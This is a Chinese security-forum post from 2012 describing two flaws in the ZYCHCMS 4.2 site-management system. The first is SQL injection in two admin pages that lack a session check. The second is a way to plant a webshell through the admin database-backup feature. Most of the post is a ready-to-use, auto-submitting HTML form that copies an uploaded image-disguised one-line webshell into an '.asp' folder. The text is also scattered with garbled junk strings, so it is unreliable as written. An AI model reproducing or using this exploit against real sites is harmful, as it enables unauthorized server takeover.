找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1753|回复: 0
打印 上一主题 下一主题

ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-10 21:09:51 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

0 B7 N: d$ Q1 h' l% v* {
8 y; K6 e3 C3 T* O4 K# u$ K0 [% y% F$ D* o

- C2 N3 d1 c5 d+ O影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)
- r7 S/ c2 L* G! T# W6 O: L ①SQL注射漏洞# }9 }; f# V8 r/ D; F0 K/ {
漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp
2 y; p- v9 r, H, L2 L3 l, W 漏洞原因:未过滤$ M- D& p9 x( y4 P5 k% \/ D
漏洞代码:
$ F- `0 d: V5 ~+ ~' D& F$ Q 都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。6 K# U+ t7 D" `; m# b
修复方法:在文件开头加入代码
5 p' Z# i" L( I3 B' F : X. w) D* b/ P$ l
5 F  [. W9 O  _/ Z: s
②后台拿WBSHELL
# L0 I! @7 l4 t; ?" U! \, P 进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。8 p2 V. f; }1 i  u$ z! y# Q
这里在网上找了一个,改了下,将就着用。
4 x5 o: i& U- U3 O2 e' l: o1 _$ K 以下是代码本地提交代码
# ^: h, Y" H/ A$ F0 n 1 k' K# [3 ~$ S( c6 A) ~- A5 V
) {6 {; g1 a9 ]% c+ k
<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>' r; J8 e8 l; E3 Z
<!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>) v+ m0 R, v# d9 t, \, S2 N
<tr>$ w$ J+ ^: H# G- s: D( }8 f6 m
<td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>
* P# ^' k% q$ L" T- O </tr>9 X, S0 t" Y6 X" I6 a. \
<tr>/ r2 c* V  t- ^  d* p8 Z
<td bgcolor=”#FFFFFF”><span class=”back_southidc”>
* O" J: z9 I0 x) J+ O0 A- `2 p </span>
9 @: D" t/ Y5 W+ u1 }$ O <table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >
" n( v2 _0 J) X" r <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >0 ~3 Z' t' f2 P9 O
<td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>& S1 z, E+ T( ^7 B
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d
9 T# V! e0 D$ l7 h$ G  V <div align=”left”>- s, l* ^$ _& L* K
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />0 O. Q0 z* h: C) s1 H2 T" f
<!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>
  v5 ]. s6 h8 S# c0 a8 b  ~. K  N) ]& b/ y <input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />* f4 e. m+ l2 N3 E" N# b
</div></td>, R! P5 j- S# e* z) t- X
</tr>
2 v. z4 n* @! k( R8 Q5 Y8 m <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>. _. J5 I; }; c
<td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>
5 }+ v& ~: f$ w/ V; y0 b+ \/ X) [1 r <td class=”td”><div align=”left”>7 R9 S6 x; U; S: }
<input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />
' w9 \! J* \2 d- c& `5 _ [如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>3 ^% ^; F- `. D/ t/ W6 w) V2 ?3 O
</tr>( P7 |- v7 ?8 k1 h1 K+ X2 B1 [
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>
1 f$ n( M4 }: [" [' K <td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>
5 m. ]+ z2 C# E <td class=”td”><div align=”left”>
# N% `* X6 d, I2 C <input type=”submit” value=”确定备份” class=”btn”5 i* G2 [* P  X+ ]. z
</div></td>$ j5 L) g# ?& @+ [
</tr>
$ c7 V/ `6 v% g  x </table></td></tr></form>- T9 D9 M5 ?5 @
</table>
9 a( S5 I, f8 H5 t( z </td>) R( [# o% ^8 w8 o
</tr>
! }# y/ ?  V9 A2 I# [ </table>9 R: L7 o' S- ~( Z+ I- u3 h  [8 A5 M/ E8 _
<script>( V* G+ w7 Z1 d! @% U0 i& u
document.all.add.submit();
8 y8 {. B8 h; q* w$ z- C </script>
3 _9 {' X. E5 m, w . n/ ~0 f  I7 }9 K) G

% \8 h# M* t4 f6 J/ H' c: t! z& g  u
7 `% `/ T0 C& M/ x5 d; A
3 V$ r' p: g4 c( [
! L# Z) S- \& N# u" l  Y2 a1 c
) c' ~  w; Z5 q" ?/ T8 {
2 R' U+ t. J/ b, `' j
$ ?  i4 _( J/ w* _# F$ F& F* U. m3 ^
) `5 N! B$ T/ I" h& c0 s5 T( {5 C
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表